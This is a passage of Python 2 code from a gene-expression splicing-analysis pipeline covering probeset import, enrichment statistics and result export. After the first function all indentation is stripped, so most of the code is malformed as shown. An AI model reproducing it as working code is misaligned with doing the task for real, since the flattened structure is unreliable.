        if 'PS:norm_expr_fold_change' in temp_index: NI_fold_index = temp_index['PS:norm_expr_fold_change']
        if 'MADS:pv_1over2' in temp_index: MADS_p1_index = temp_index['MADS:pv_1over2']
        if 'MADS:pv_2over1' in temp_index: MADS_p2_index = temp_index['MADS:pv_2over1']
        ### NOTE(review): a copy-paste line previously re-assigned MADS_p2_index
        ### under an unrelated 'TC:expr_fold_change' header check; it was
        ### redundant/erroneous and has been removed.
        if 'PsId' in temp_index: ps_index = temp_index['PsId']
        for tc in external_probeset_db:
            ### NOTE(review): this loop also visits the header row itself, which
            ### yields a pseudo-entry with score and p-value of 1 — behavior
            ### preserved from the original; confirm upstream filtering if undesired.
            for row in external_probeset_db[tc]:
                try: NI_fold = float(row[NI_fold_index])
                except Exception: NI_fold = 1
                try: MADSp1 = float(row[MADS_p1_index])
                except Exception: MADSp1 = 1
                try: MADSp2 = float(row[MADS_p2_index])
                except Exception: MADSp2 = 1 ### BUGFIX: previously re-assigned MADSp1, leaving MADSp2 unbound
                if MADSp1<MADSp2: pval = MADSp1
                else: pval = MADSp2
                probeset = row[ps_index]
                external_probeset_db2[probeset] = NI_fold,pval
    else:
        ext_type = 'generic'
        ### Collect the absolute magnitudes of each of the two columns to decide
        ### which holds scores and which holds p-values.
        a = []; b = []
        for uid in external_probeset_db:
            try: a.append(abs(float(external_probeset_db[uid][0][0])))
            except Exception: pass
            try: b.append(abs(float(external_probeset_db[uid][0][1])))
            except Exception: pass
        a.sort(); b.sort(); pval_index = None; score_index = None
        if len(a)>0:
            if max(a) > 1: score_index = 0
            else: pval_index = 0
        if len(b)>0:
            if max(b) > 1: score_index = 1
            else: pval_index = 1
        for uid in external_probeset_db:
            if score_index != None: score = external_probeset_db[uid][0][score_index]
            else: score = 1
            if pval_index != None: pval = external_probeset_db[uid][0][pval_index]
            else: pval = 1
            external_probeset_db2[uid] = score,pval
    return external_probeset_db2, ext_type
def importExternalProbesetData(dataset_dir):
excluded_probeset_db={}; splice_event_list=[]; p_value_call={}; permute_p_values={}; gene_expression_diff_db={}
analyzed_probeset_db = {}
external_probeset_db = importExternalDBList(dataset_dir)
external_probeset_db, ext_type = determineExternalType(external_probeset_db)
for probeset in exon_db: analyzed_probeset_db[probeset] = []
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
if len(filtered_probeset_db)>0:
temp_db={}
for probeset in analyzed_probeset_db: temp_db[probeset]=[]
for probeset in temp_db:
try: filtered_probeset_db[probeset]
except KeyError: del analyzed_probeset_db[probeset]
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing annotation)
if filter_for_AS == 'yes':
for probeset in exon_db:
as_call = exon_db[probeset].SplicingCall()
if as_call == 0:
try: del analyzed_probeset_db[probeset]
except KeyError: null=[]
for probeset in analyzed_probeset_db:
ed = exon_db[probeset]; geneid = ed.GeneID()
td = TranscriptionData('',''); gene_expression_diff_db[geneid] = td
if probeset in external_probeset_db:
exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
splicing_index,normIntensityP = external_probeset_db[probeset]
group1_ratios=[]; group2_ratios=[];exp_log_ratio=''; ttest_exp_p='';normIntensityP='';opposite_SI_log_mean=''
sid = ExonData(splicing_index,probeset,critical_exon_list,geneid,group1_ratios,group2_ratios,normIntensityP,opposite_SI_log_mean)
splice_event_list.append((splicing_index,sid))
else:
### Also record the data for probesets that are excluded... Used by DomainGraph
eed = ExcludedExonData(0,geneid,'NA')
excluded_probeset_db[probeset] = eed
print len(splice_event_list), 'pre-filtered external results imported...\n'
return splice_event_list, p_value_call, permute_p_values, excluded_probeset_db, gene_expression_diff_db
def splicingAnalysisAlgorithms(nonlog_NI_db,fold_dbase,dataset_name,gene_expression_diff_db,exon_db,ex_db,si_db,dataset_dir):
protein_exon_feature_db={}; global regulated_exon_junction_db; global critical_exon_annotation_db; global probeset_comp_db; probeset_comp_db={}
if original_conditions == 2: print "Beginning to run", analysis_method, "algorithm on",dataset_name[0:-1],"data"
if run_from_scratch == 'Annotate External Results':
splice_event_list, p_value_call, permute_p_values, excluded_probeset_db, gene_expression_diff_db = importExternalProbesetData(dataset_dir)
elif analysis_method == 'ASPIRE' or analysis_method == 'linearregres':
original_exon_db = exon_db
if original_conditions > 2:
splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db = ex_db
splice_event_list, p_value_call, permute_p_values, exon_db, regulated_exon_junction_db = furtherProcessJunctionScores(splice_event_list, probeset_comp_db, permute_p_values)
else:
splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db = analyzeJunctionSplicing(nonlog_NI_db)
splice_event_list, p_value_call, permute_p_values, exon_db, regulated_exon_junction_db = furtherProcessJunctionScores(splice_event_list, probeset_comp_db, permute_p_values)
elif analysis_method == 'splicing-index':
regulated_exon_junction_db = {}
if original_conditions > 2:
excluded_probeset_db = ex_db; splice_event_list = si_db;
clearObjectsFromMemory(ex_db); clearObjectsFromMemory(si_db)
ex_db=[]; si_db=[]; permute_p_values={}; p_value_call=''
else: splice_event_list, p_value_call, permute_p_values, excluded_probeset_db = analyzeSplicingIndex(fold_dbase)
elif analysis_method == 'FIRMA':
regulated_exon_junction_db = {}
splice_event_list, p_value_call, permute_p_values, excluded_probeset_db = FIRMAanalysis(fold_dbase)
global permuted_z_scores; permuted_z_scores={}; global original_domain_z_score_data; original_domain_z_score_data={}
global original_microRNA_z_score_data; original_microRNA_z_score_data={}
nonlog_NI_db=[] ### Clear memory of this large dictionary
try: clearObjectsFromMemory(original_avg_const_exp_db); clearObjectsFromMemory(array_raw_group_values)
except Exception: null=[]
try: clearObjectsFromMemory(avg_const_exp_db)
except Exception: null=[]
try: clearObjectsFromMemory(alt_junction_db)
except Exception: null=[]
try: clearObjectsFromMemory(fold_dbase); fold_dbase=[]
except Exception: null=[]
microRNA_full_exon_db,microRNA_count_db,gene_microRNA_denom = ExonAnalyze_module.importmicroRNADataExon(species,array_type,exon_db,microRNA_prediction_method,explicit_data_type,root_dir)
#print "MicroRNA data imported"
if use_direct_domain_alignments_only == 'yes':
protein_ft_db_len,domain_associated_genes = importProbesetAligningDomains(exon_db,'gene')
else: protein_ft_db_len,domain_associated_genes = importProbesetProteinCompDomains(exon_db,'gene','exoncomp')
if perform_element_permutation_analysis == 'yes':
probeset_to_gene,denominator_list = getInputsForPermutationAnalysis(exon_db)
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
exon_gene_array_translation_file = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_'+array_type+'-exon_probesets.txt'
try: exon_array_translation_db = importGeneric(exon_gene_array_translation_file)
except Exception: exon_array_translation_db={} ### Not present for all species
exon_hits={}; clearObjectsFromMemory(probeset_comp_db); probeset_comp_db=[]
###Run analyses in the ExonAnalyze_module module to assess functional changes
for (score,ed) in splice_event_list:
geneid = ed.GeneID()
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
pl = string.split(ed.Probeset1(),'|'); probeset1 = pl[0] ### When agglomerated, this is important
uid = (probeset1,ed.Probeset2())
else: uid = ed.Probeset1()
gene_exon = geneid,uid; exon_hits[gene_exon] = ed
#print probeset1,ed.Probeset1(),ed.Probeset2(),gene_exon,ed.CriticalExons()
dataset_name_original = analysis_method+'-'+dataset_name[8:-1]
global functional_attribute_db; global protein_features
### Possibly Block-out code for DomainGraph export
########### Re-import the exon_db for significant entries with full annotaitons
exon_db={}; filtered_arrayids={}; filter_status='yes' ###Use this as a means to save memory (import multiple times - only storing different types relevant information)
for (score,entry) in splice_event_list:
try: probeset = original_exon_db[entry.Probeset1()].Probeset()
except Exception: probeset = entry.Probeset1()
pl = string.split(probeset,'|'); probeset = pl[0]; filtered_arrayids[probeset] = [] ### When agglomerated, this is important
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
try: probeset = entry.Probeset2(); filtered_arrayids[probeset] = []
except AttributeError: null =[] ###occurs when running Splicing
exon_db = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status);null=[] ###replace existing exon_db (probeset_annotations_file should be a global)
###domain_gene_changed_count_db is the number of genes for each domain that are found for regulated probesets
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
if use_direct_domain_alignments_only == 'yes':
protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetAligningDomains(regulated_exon_junction_db,'probeset')
else: protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetProteinCompDomains(regulated_exon_junction_db,'probeset','exoncomp')
else:
if use_direct_domain_alignments_only == 'yes':
protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetAligningDomains(exon_db,'probeset')
else: protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetProteinCompDomains(exon_db,'probeset','exoncomp')
filtered_microRNA_exon_db = ExonAnalyze_module.filterMicroRNAProbesetAssociations(microRNA_full_exon_db,exon_hits)
microRNA_full_exon_db=[]
###add microRNA data to functional_attribute_db
microRNA_hit_gene_count_db = {}; all_microRNA_gene_hits={}; microRNA_attribute_db={}; probeset_mirBS_db={}
for (affygene,uid) in filtered_microRNA_exon_db: ###example ('G7091354', 'E20|') [('hsa-miR-130a', 'Pbxip1'), ('hsa-miR-130a', 'Pbxip1'
###3-1-08
miR_list = []
microRNA_symbol_list = filtered_microRNA_exon_db[(affygene,uid)]
for mir_key in microRNA_symbol_list:
microRNA,gene_symbol,miR_seq, miR_sources = mir_key
#if 'ENS' in microRNA: print microRNA; kill ### bug in some miRNA annotations introduced in the build process
specific_microRNA_tuple = (microRNA,'~')
try: microRNA_hit_gene_count_db[microRNA].append(affygene)
except KeyError: microRNA_hit_gene_count_db[microRNA] = [affygene]
###Create a database with the same structure as "protein_exon_feature_db"(below) for over-representation analysis (direction specific), after linking up splice direction data
try: microRNA_attribute_db[(affygene,uid)].append(specific_microRNA_tuple)
except KeyError: microRNA_attribute_db[(affygene,uid)] = [specific_microRNA_tuple]
miR_data = microRNA+':'+miR_sources
miR_list.append(miR_data) ###Add miR information to the record
function_type = ('miR-sequence: ' +'('+miR_data+')'+miR_seq,'~') ###Add miR sequence information to the sequence field of the report
try: functional_attribute_db[(affygene,uid)].append(function_type)
except KeyError: functional_attribute_db[(affygene,uid)]=[function_type]
#print (affygene,uid), [function_type];kill
if perform_element_permutation_analysis == 'yes':
try: probeset_mirBS_db[uid].append(microRNA)
except KeyError: probeset_mirBS_db[uid] = [microRNA]
miR_str = string.join(miR_list,','); miR_str = '('+miR_str+')'
function_type = ('microRNA-target'+miR_str,'~')
try: functional_attribute_db[(affygene,uid)].append(function_type)
except KeyError: functional_attribute_db[(affygene,uid)]=[function_type]
all_microRNA_gene_hits[affygene] = []
###Replace the gene list for each microRNA hit with count data
microRNA_hit_gene_count_db = eliminate_redundant_dict_values(microRNA_hit_gene_count_db)
###Combines any additional feature alignment info identified from 'ExonAnalyze_module.characterizeProteinLevelExonChanges' (e.g. from Ensembl or junction-based queries rather than exon specific) and combines
###this with this database of (Gene,Exon)=[(functional element 1,'~'),(functional element 2,'~')] for downstream result file annotatations
domain_hit_gene_count_db = {}; all_domain_gene_hits = {}; probeset_domain_db={}
for entry in protein_features:
gene,uid = entry
for data_tuple in protein_features[entry]:
domain,call = data_tuple
try: protein_exon_feature_db[entry].append(data_tuple)
except KeyError: protein_exon_feature_db[entry] = [data_tuple]
try: domain_hit_gene_count_db[domain].append(gene)
except KeyError: domain_hit_gene_count_db[domain] = [gene]
all_domain_gene_hits[gene]=[]
if perform_element_permutation_analysis == 'yes':
try: probeset_domain_db[uid].append(domain)
except KeyError: probeset_domain_db[uid] = [domain]
protein_features=[]; domain_gene_changed_count_db=[]
###Replace the gene list for each microRNA hit with count data
domain_hit_gene_count_db = eliminate_redundant_dict_values(domain_hit_gene_count_db)
############ Perform Element Over-Representation Analysis ############
"""Domain/FT Fishers-Exact test: with "protein_exon_feature_db" (transformed to "domain_hit_gene_count_db") we can analyze over-representation of domain/features WITHOUT taking into account exon-inclusion or exclusion
Do this using: "domain_associated_genes", which contains domain tuple ('Tyr_pkinase', 'IPR001245') as a key and count in unique genes as the value in addition to
Number of genes linked to splice events "regulated" (SI and Midas p<0.05), number of genes with constitutive probesets
MicroRNA Fishers-Exact test: "filtered_microRNA_exon_db" contains gene/exon to microRNA data. For each microRNA, count the representation in spliced genes microRNA (unique gene count - make this from the mentioned file)
Do this using: "microRNA_count_db"""
domain_gene_counts = {} ### Get unique gene counts for each domain
for domain in domain_associated_genes:
domain_gene_counts[domain] = len(domain_associated_genes[domain])
total_microRNA_gene_hit_count = len(all_microRNA_gene_hits)
total_microRNA_gene_denom_count = len(gene_microRNA_denom)
Nm,Rm = calculateZScores(microRNA_hit_gene_count_db,microRNA_count_db,total_microRNA_gene_denom_count,total_microRNA_gene_hit_count,'microRNA')
gene_microRNA_denom =[]
summary_data_db['miRNA_gene_denom'] = total_microRNA_gene_denom_count
summary_data_db['miRNA_gene_hits'] = total_microRNA_gene_hit_count
summary_data_db['alt_events']=len(splice_event_list)
total_domain_gene_hit_count = len(all_domain_gene_hits)
total_domain_gene_denom_count = protein_ft_db_len ###genes connected to domain annotations
Nd,Rd = calculateZScores(domain_hit_gene_count_db,domain_gene_counts,total_domain_gene_denom_count,total_domain_gene_hit_count,'domain')
microRNA_hit_gene_counts={}; gene_to_miR_db={} ### Get unique gene counts for each miR and the converse
for microRNA in microRNA_hit_gene_count_db:
microRNA_hit_gene_counts[microRNA] = len(microRNA_hit_gene_count_db[microRNA])
for gene in microRNA_hit_gene_count_db[microRNA]:
try: gene_to_miR_db[gene].append(microRNA)
except KeyError: gene_to_miR_db[gene] = [microRNA]
gene_to_miR_db = eliminate_redundant_dict_values(gene_to_miR_db)
if perform_element_permutation_analysis == 'yes':
###Begin Domain/microRNA Permute Analysis
input_count = len(splice_event_list) ### Number of probesets or probeset pairs (junction array) alternatively regulated
original_increment = int(permutations/20); increment = original_increment
start_time = time.time(); print 'Permuting the Domain/miRBS analysis %d times' % permutations
x=0; permute_domain_inputs=[]; permute_miR_inputs=[]
while x<permutations:
if x == increment: increment+=original_increment; print '*',
permute_input_list = random.sample(denominator_list,input_count); x+=1
permute_domain_input_gene_counts = countGenesForElement(permute_input_list,probeset_to_gene,probeset_domain_db)
permute_domain_inputs.append(permute_domain_input_gene_counts)
permute_miR_input_gene_counts = countGenesForElement(permute_input_list,probeset_to_gene,probeset_mirBS_db)
permute_miR_inputs.append(permute_miR_input_gene_counts)
calculatePermuteZScores(permute_domain_inputs,domain_gene_counts,Nd,Rd)
calculatePermuteZScores(permute_miR_inputs,microRNA_hit_gene_counts,Nm,Rm)
calculatePermuteStats(original_domain_z_score_data)
calculatePermuteStats(original_microRNA_z_score_data)
adjustPermuteStats(original_domain_z_score_data)
adjustPermuteStats(original_microRNA_z_score_data)
exportZScoreData(original_domain_z_score_data,'ft-domain')
exportZScoreData(original_microRNA_z_score_data,'microRNA')
end_time = time.time(); time_diff = int(end_time-start_time)
print "Enrichment p-values for Domains/miRBS calculated in %d seconds" % time_diff
denominator_list=[]
try: clearObjectsFromMemory(original_microRNA_z_score_data)
except Exception: null=[]
microRNA_hit_gene_count_db={}; microRNA_hit_gene_counts={};
clearObjectsFromMemory(permuted_z_scores); permuted_z_scores=[]; original_domain_z_score_data=[]
if (array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null')) and analysis_method != 'splicing-index':
critical_probeset_annotation_db = getJunctionSplicingAnnotations(regulated_exon_junction_db)
probeset_aligning_db = importProbesetAligningDomains(regulated_exon_junction_db,'perfect_match')
else: probeset_aligning_db = importProbesetAligningDomains(exon_db,'perfect_match')
############ Export exon/junction level results ############
splice_event_db={}; protein_length_list=[]; aspire_gene_results={}
critical_gene_exons={}; unique_exon_event_db={}; comparison_count={}; direct_domain_gene_alignments={}
functional_attribute_db2={}; protein_exon_feature_db2={}; microRNA_exon_feature_db2={}
external_exon_annot={}; gene_exon_region={}; gene_smallest_p={}; gene_splice_event_score={}; alternatively_reg_tc={}
aspire_output = root_dir+'AltResults/AlternativeOutput/' + dataset_name + analysis_method+'-exon-inclusion-results.txt'
data = export.ExportFile(aspire_output)
goelite_output = root_dir+'GO-Elite/AltExon/AS.'+ dataset_name + analysis_method+'.txt'
goelite_data = export.ExportFile(goelite_output); gcn=0
#print 'LENGTH OF THE GENE ANNOTATION DATABASE',len(annotate_db)
if array_type != 'AltMouse':
DG_output = root_dir+'AltResults/DomainGraph/' + dataset_name + analysis_method+'-DomainGraph.txt'
DG_data = export.ExportFile(DG_output)
### Write out only the inclusion hits to a subdir
SRFinder_inclusion = root_dir+'GO-Elite/exon/' + dataset_name + analysis_method+'-inclusion.txt'
SRFinder_in_data = export.ExportFile(SRFinder_inclusion)
SRFinder_in_data.write('probeset\tSystemCode\tdeltaI\tp-value\n')
### Write out only the exclusion hits to a subdir
SRFinder_exclusion = root_dir+'GO-Elite/exon/' + dataset_name + analysis_method+'-exclusion.txt'
SRFinder_ex_data = export.ExportFile(SRFinder_exclusion)
SRFinder_ex_data.write('probeset\tSystemCode\tdeltaI\tp-value\n')
### Write out only the denominator set to a subdir
SRFinder_denom = root_dir+'GO-Elite/exon_denominator/' + species+'-'+array_type+'.txt'
SRFinder_denom_data = export.ExportFile(SRFinder_denom)
SRFinder_denom_data.write('probeset\tSystemCode\n')
ens_version = unique.getCurrentGeneDatabaseVersion()
ProcessedSpliceData_output = string.replace(DG_output,'DomainGraph','ProcessedSpliceData') ### This is the same as the DG export but without converting the probeset IDs for non-exon arrays
ProcessedSpliceData_data = export.ExportFile(ProcessedSpliceData_output)
if ens_version == '':
try:
elite_db_versions = UI.returnDirectoriesNoReplace('/AltDatabase')
if len(elite_db_versions)>0: ens_version = elite_db_versions[0]
except Exception: null=[]
ens_version = string.replace(ens_version,'EnsMart','ENS_')
DG_data.write(ens_version+"\n")
DG_data.write("Probeset\tGeneID\tRegulation call\tSI\tSI p-value\tMiDAS p-value\n")
ProcessedSpliceData_data.write("ExonID(s)\tGeneID\tRegulation call\t"+analysis_method+"\t"+analysis_method+" p-value\tMiDAS p-value\n")
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
if perform_permutation_analysis == 'yes': p_value_type = 'permutation-values'
else: p_value_type = 'FDR-'+p_value_call
if array_type == 'AltMouse': gene_name = 'AffyGene'; extra_transcript_annotation = 'block_structure'; extra_exon_annotation = 'splice_event_description'
if array_type == 'junction' or array_type == 'RNASeq':
gene_name = 'Ensembl'; extra_transcript_annotation = 'transcript cluster ID'; extra_exon_annotation = 'distal exon-region-ID'
goelite_data.write("GeneID\tSystemCode\tscore\tp-value\tSymbol\tExonIDs\n")
if array_type == 'RNASeq':
id1='junctionID-1'; id2='junctionID-2'; loc_column='exon/junction locations'
extra_transcript_annotation = 'Known/Novel Feature'
else: id1='probeset1'; id2='probeset2'; loc_column='probeset locations'
title = [gene_name,analysis_method,'symbol','description','exons1','exons2','regulation_call','event_call',id1,'norm-p1',id2,'norm-p2','fold1','fold2']
title +=['adj-fold1' ,'adj-fold2' ,extra_transcript_annotation,'critical_up_exons','critical_down_exons','functional_prediction','uniprot-ens_feature_predictions']
title +=['peptide_predictions','exp1','exp2','ens_overlapping_domains','constitutive_baseline_exp',p_value_call,p_value_type,'permutation-false-positives']
title +=['gene-expression-change', extra_exon_annotation ,'ExternalExonIDs','ExonRegionID','SplicingEvent','ExonAnnotationScore','large_splicing_diff',loc_column]
else:
goelite_data.write("GeneID\tSystemCode\tSI\tSI p-value\tMiDAS p-value\tSymbol\tExonID\n")
if analysis_method == 'splicing-index':
NIpval = 'SI_rawp'; splicing_score = 'Splicing-Index'; lowestp = 'lowest_p (MIDAS or SI)'; AdjPcolumn = 'Deviation-Value'; #AdjPcolumn = 'SI_adjp'
else:
NIpval = 'FIRMA_rawp'; splicing_score = 'FIRMA_fold'; lowestp = 'lowest_p (MIDAS or FIRMA)'; AdjPcolumn = 'Deviation-Value'; #AdjPcolumn = 'FIRMA_adjp'
if array_type == 'RNASeq':
id1='junctionID'; pval_column='junction p-value'; loc_column='junction location'
else: id1='probeset'; pval_column='probeset p-value'; loc_column='probeset location'
if array_type == 'RNASeq': secondary_ID_title = 'Known/Novel Feature'
else: secondary_ID_title = 'alternative gene ID'
title= ['Ensembl',splicing_score,'symbol','description','exons','regulation_call',id1,pval_column,lowestp,'midas p-value','fold','adjfold']
title+=['up_exons','down_exons','functional_prediction','uniprot-ens_feature_predictions','peptide_predictions','ens_overlapping_domains','baseline_probeset_exp']
title+=['constitutive_baseline_exp',NIpval,AdjPcolumn,'gene-expression-change']
title+=[secondary_ID_title, 'ensembl exons', 'consitutive exon', 'exon-region-ID', 'exon annotations','distal exon-region-ID',loc_column]
title = string.join(title,'\t') + '\n'
try:
if original_conditions>2: title = string.replace(title,'regulation_call','conditions_compared')
except Exception: null=[]
data.write(title)
### Calculate adjusted normalized intensity p-values
fdr_exon_stats={}
if analysis_method != 'ASPIRE' and 'linearregres' not in analysis_method:
for (score,entry) in splice_event_list: ### These are all "significant entries"
fds = FDRStats(entry.TTestNormalizedRatios())
fdr_exon_stats[entry.Probeset1()] = fds
for probeset in excluded_probeset_db: ### These are all "non-significant entries"
fds = FDRStats(excluded_probeset_db[probeset].TTestNormalizedRatios())
fdr_exon_stats[probeset] = fds
try: adjustPermuteStats(fdr_exon_stats)
except Exception: null=[]
### Calculate score average and stdev for each gene to alter get a Deviation Value
gene_deviation_db={}
for (score,entry) in splice_event_list:
dI = entry.Score(); geneID = entry.GeneID()
try: gene_deviation_db[geneID].append(dI)
except Exception: gene_deviation_db[geneID] = [dI]
for i in excluded_probeset_db:
entry = excluded_probeset_db[i]
try: dI = entry.Score(); geneID = entry.GeneID()
except Exception: geneID = entry[1]; dI = entry[-1]
try: gene_deviation_db[geneID].append(dI)
except Exception: None ### Don't include genes with no hits
for geneID in gene_deviation_db:
try:
avg_dI=statistics.avg(gene_deviation_db[geneID])
stdev_dI=statistics.stdev(gene_deviation_db[geneID])
gene_deviation_db[geneID] = avg_dI,stdev_dI
except Exception:
gene_deviation_db[geneID] = 'NA','NA'
event_count = 0
for (score,entry) in splice_event_list:
event_count += 1
dI = entry.Score(); probeset1 = entry.Probeset1(); regulation_call = entry.RegulationCall(); event_call = entry.EventCall();critical_exon_list = entry.CriticalExonTuple()
probeset1_display = probeset1; selected_probeset = probeset1
if agglomerate_inclusion_probesets == 'yes':
if array_type == 'AltMouse':
exons1 = original_exon_db[probeset1].ExonID()
try: probeset1 = original_exon_db[probeset1].Probeset()
except Exception: null=[]
else:
probeset1 = probeset1; exons1 = original_exon_db[probeset1].ExonID()
try: selected_probeset = original_exon_db[probeset1].Probeset()
except Exception: selected_probeset = probeset1
else:
try: exons1 = exon_db[probeset1].ExonID()
except Exception:
print probeset1, len(exon_db)
for i in exon_db: print i; break
kill
critical_probeset_list = [selected_probeset]
affygene = entry.GeneID()
### Calculate deviation value for each exon
avg_dI,stdev_dI = gene_deviation_db[affygene]
try: DV = deviation(dI,avg_dI,stdev_dI) ### Note: the dI values are always in log2 space, independent of platform
except Exception: DV = 'NA'
if affygene in annotate_db: description = annotate_db[affygene].Description(); symbol = annotate_db[affygene].Symbol()
else: description = ''; symbol = ''
ped1 = entry.ProbesetExprData1(); adjfold1 = ped1.AdjFold(); exp1 = ped1.BaselineExp(); fold1 = ped1.FoldChange(); rawp1 = ped1.ExpPval()
### Get Constitutive expression values
baseline_const_exp = entry.ConstitutiveExpression() ### For multiple group comparisosn
#if affygene in gene_expression_diff_db: mean_fold_change = gene_expression_diff_db[affygene].ConstitutiveFoldStr()
try: mean_fold_change = str(entry.ConstitutiveFold()) ### For multi-condition analyses, the gene expression is dependent on the conditions compared
except Exception: mean_fold_change = gene_expression_diff_db[affygene].ConstitutiveFoldStr()
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
probeset2 = entry.Probeset2(); exons2 = exon_db[probeset2].ExonID(); rawp1 = str(entry.TTestNormalizedRatios()); rawp2 = str(entry.TTestNormalizedRatios2()); critical_probeset_list.append(probeset2)
ped2 = entry.ProbesetExprData2(); adjfold2 = ped2.AdjFold(); exp2 = ped2.BaselineExp(); fold2 = ped2.FoldChange()
try: location_summary=original_exon_db[selected_probeset].LocationSummary()+'|'+original_exon_db[probeset2].LocationSummary()
except Exception:
try: location_summary=exon_db[selected_probeset].LocationSummary()+'|'+exon_db[probeset2].LocationSummary()
except Exception: location_summary=''
if array_type == 'AltMouse':
extra_transcript_annotation = exon_db[probeset1].GeneStructure()
else:
try: extra_exon_annotation = last_exon_region_db[affygene]
except KeyError: extra_exon_annotation = ''
try:
tc1 = original_exon_db[probeset1].SecondaryGeneID()
tc2 = original_exon_db[probeset2].SecondaryGeneID() ### Transcript Cluster
probeset_tc = makeUnique([tc1,tc2])
extra_transcript_annotation = string.join(probeset_tc,'|')
try: alternatively_reg_tc[affygene] += probeset_tc
except KeyError: alternatively_reg_tc[affygene] = probeset_tc
except Exception: extra_transcript_annotation=''
if array_type == 'RNASeq':
try: extra_transcript_annotation = entry.NovelEvent() ### Instead of secondary gene ID, list known vs. novel reciprocal junction annotation
except Exception: None
exp_list = [float(exp1),float(exp2),float(exp1)+float(fold1),float(exp2)+float(fold2)]; exp_list.sort(); exp_list.reverse()
probeset_tuple = (probeset1,probeset2)
else:
try: exp_list = [float(exp1),float(exp1)+float(fold1)]; exp_list.sort(); exp_list.reverse()
except Exception: exp_list = ['']
probeset_tuple = (probeset1)
highest_exp = exp_list[0]
###Use permuted p-value or lowest expression junction p-value based on the situtation
###This p-value is used to filter out aspire events for further analyses
if len(p_value_call)>0:
if probeset_tuple in permute_p_values:
lowest_raw_p, pos_permute, total_permute, false_pos = permute_p_values[probeset_tuple]
else: lowest_raw_p = "NA"; pos_permute = "NA"; total_permute = "NA"; false_pos = "NA"
else:
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method: raw_p_list = [entry.TTestNormalizedRatios(),entry.TTestNormalizedRatios2()] #raw_p_list = [float(rawp1),float(rawp2)]; raw_p_list.sort()
else:
try: raw_p_list = [float(entry.TTestNormalizedRatios())] ###Could also be rawp1, but this is more appropriate
except Exception: raw_p_list = [1] ### Occurs when p='NA'
raw_p_list.sort()
lowest_raw_p = raw_p_list[0]; pos_permute = "NA"; total_permute = "NA"; false_pos = "NA"
if perform_permutation_analysis == 'yes':
p_value_extra = str(pos_permute)+' out of '+str(total_permute)
else: p_value_extra = str(pos_permute)
up_exons = ''; down_exons = ''; up_exon_list = []; down_exon_list = []; gene_exon_list=[]
exon_data = critical_exon_list
variable = exon_data[0]
if variable == 1 and regulation_call == 'upregulated':
for exon in exon_data[1]:
up_exons = up_exons + exon + ',';up_exon_list.append(exon)
key = affygene,exon+'|'; gene_exon_list.append(key)
elif variable == 1 and regulation_call == 'downregulated':
for exon in exon_data[1]:
down_exons = down_exons + exon + ',';down_exon_list.append(exon)
key = affygene,exon+'|';gene_exon_list.append(key)
else:
try: exon1 = exon_data[1][0]; exon2 = exon_data[1][1]
except Exception: print exon_data;kill
if adjfold1 > 0:
up_exons = up_exons + exon1 + ',';down_exons = down_exons + exon2 + ','
up_exon_list.append(exon1); down_exon_list.append(exon2)
key = affygene,exon1+'|'; gene_exon_list.append(key);key = affygene,exon2+'|'; gene_exon_list.append(key)
else:
up_exons = up_exons + exon2 + ',';down_exons = down_exons + exon1 + ','
up_exon_list.append(exon2); down_exon_list.append(exon1)
key = affygene,exon1+'|'; gene_exon_list.append(key); key = affygene,exon2+'|'; gene_exon_list.append(key)
up_exons = up_exons[0:-1];down_exons = down_exons[0:-1]
try: ### Get comparisons group annotation data for multigroup comparison analyses
if original_conditions>2:
try: regulation_call = ped1.Annotation()
except Exception: null=[]
except Exception: null=[]
###Format functional results based on exon level fold change
null = []
#global a; a = exon_hits; global b; b=microRNA_attribute_db; kill
"""if 'G7100684@J934332_RC@j_at' in critical_probeset_list:
print probeset1, probeset2, gene, critical_probeset_list, 'blah'
if ('G7100684', ('G7100684@J934333_RC@j_at', 'G7100684@J934332_RC@j_at')) in functional_attribute_db:
print functional_attribute_db[('G7100684', ('G7100684@J934333_RC@j_at', 'G7100684@J934332_RC@j_at'))];blah
blah"""
new_functional_attribute_str, functional_attribute_list2, seq_attribute_str,protein_length_list = format_exon_functional_attributes(affygene,critical_probeset_list,functional_attribute_db,up_exon_list,down_exon_list,protein_length_list)
new_uniprot_exon_feature_str, uniprot_exon_feature_list, null, null = format_exon_functional_attributes(affygene,critical_probeset_list,protein_exon_feature_db,up_exon_list,down_exon_list,null)
null, microRNA_exon_feature_list, null, null = format_exon_functional_attributes(affygene,critical_probeset_list,microRNA_attribute_db,up_exon_list,down_exon_list,null)
if len(new_functional_attribute_str) == 0: new_functional_attribute_str = ' '
if len(new_uniprot_exon_feature_str) == 0: new_uniprot_exon_feature_str = ' '
if len(seq_attribute_str) > 12000: seq_attribute_str = 'The sequence is too long to report for spreadsheet analysis'
### Add entries to a database to quantify the number of reciprocal isoforms regulated
reciprocal_isoform_data = [len(critical_exon_list[1]),critical_exon_list[1],event_call,regulation_call]
try: float((lowest_raw_p))
except ValueError: lowest_raw_p=0
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: unique_exon_event_db[affygene].append(reciprocal_isoform_data)
except KeyError: unique_exon_event_db[affygene] = [reciprocal_isoform_data]
### Add functional attribute information to a new database
for item in uniprot_exon_feature_list:
attribute = item[0]
exon = item[1]
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: protein_exon_feature_db2[affygene,attribute].append(exon)
